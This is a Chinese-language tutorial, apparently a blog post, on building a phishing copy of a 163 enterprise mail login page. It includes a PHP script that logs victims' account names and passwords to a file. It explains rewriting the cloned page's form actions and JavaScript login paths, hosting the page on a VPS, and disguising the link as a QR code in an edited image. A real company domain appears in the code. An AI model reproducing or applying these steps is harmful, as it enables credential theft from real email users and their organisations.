这里克隆163企业邮箱比较费劲，和之前的还不一样，这个克隆的目录比较多，发现好多工具都克隆不全，要不就是缺少图片要不就是缺少功能
首先效果

可以看到成功记录账户密码，接下来再来伪装到域名

这里克隆网站使用神器



会在My Web Sites目录下生成克隆的网站
整体克隆下的网站目录如下：

可以看到打开网页相同，然后看看功能是否正常使用
可以看到网页功能正常使用，当我们输入账户密码登录后会跳转到163邮箱

首先记录密码脚本如下：

<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {$account_name = $_POST['account_name'];$password = $_POST['password'];// 检查用户名和密码是否合法，这里应该有相应的验证逻辑// 打开文件以追加写入$handle = fopen('result.txt', 'ab+');if ($handle) {$data = "account_name: $account_name - Password: $password\n";fwrite($handle, $data);fclose($handle);} else {echo "无法打开文件 'result.txt' 进行写入。";}
} else {echo "非法访问。";
}
?>

参数是account_name和password，由网络请求包中获得

这里我们主要在意的点就是账户密码登录，既然登录功能可以正常使用，说明form表单是正常的，那么我们将form表单更改到我们的记录密码的login.php文件
那么需要改index.html中的form表单
整个克隆下来的文件中就两个index.html文件，一个在根目录下，一个在子目录mail.xxx.cn下

可以看到根目录下的没有form表单说明这里和我们捕获密码没关系，那么看代码，是主要跳到mail.xxx.cn/index.html，那么说明在mail.xxx.cn目录下
那么我们主要修改目录下的index.html
共三处form表单处
可以看到action跳转到了https://mailh.qiye.163.com/login/domainEntLogin，那么我们将第一处的action改完login.php

修改第二处action如下

第三处action如下
可以看到不需要修改

这样就改完了，放到vps上访问发现输入账户密码后登录还是跳转到163主页，跳转的url仍然是/login/domainEntLogin路径，那么肯定有/login/domainEntLogin没改完的地方
可以看到js中存在该路径

共两处涉及login/domainEntLogin

修改如下：

可以看到修改完成

之后发现还需要去掉script部分

<script type="text/javascript">window.myDomain = "wanlitire.cn";window.isCommonPage = false;if(window.myDomain == "qiye.163.com"){window.isCommonPage = true;}
</script>

再次访问网站输入账号密码登录

可以看到成功抓到密码
这里有个问题就是但是跳转之后显示是这样的，所以很容易引起怀疑，之后修改吧，暂时我没想到好的方法，想到的一种思路是跳转到这个页面限制时间零点几秒之后跳转到163邮箱首页，之后修改

为了让链接更加隐藏，做成二维码的形式
使用草料二维码官网进行制作
https://cli.im/
扫码后直接跳转网站

然后在网上随便找个图片

进行p图，修改文字和二维码

可以看到成品如上，还不错